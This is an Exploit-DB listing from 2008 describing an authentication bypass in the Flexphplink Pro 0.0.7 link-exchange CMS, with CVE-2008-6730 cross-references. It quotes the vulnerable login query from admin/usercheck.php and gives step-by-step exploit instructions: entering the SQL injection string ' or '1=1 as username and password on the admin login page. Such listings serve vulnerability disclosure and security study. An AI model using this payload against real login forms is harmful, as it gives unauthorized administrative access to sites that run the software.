Lucene search
X0rEDB-ID:7616HistoryDec 29, 2008 - 12:00 a.m.
Flexphplink 0.0.x - Authentication Bypass
2008-12-2900:00:00
x0r
www.exploit-db.com
30
AI Score
7.4
Confidence
Low
#############################################
Autore: x0r
Email: [email protected]
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphplink Pro
Version: 0.0.7
Download: http://www.china-on-site.com/flexphplink/downloads.html
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
Greetz: Visit My Site Pls :P
# milw0rm.com [2008-12-29]Related
cvelist
cvelist
CVE-2008-6730
2009-04-20 14:06:00
cve
cve
CVE-2008-6730
2009-04-20 14:30:00
nvd
nvd
CVE-2008-6730
2009-04-20 14:30:00
prion
prion
Sql injection
2009-04-20 14:30:00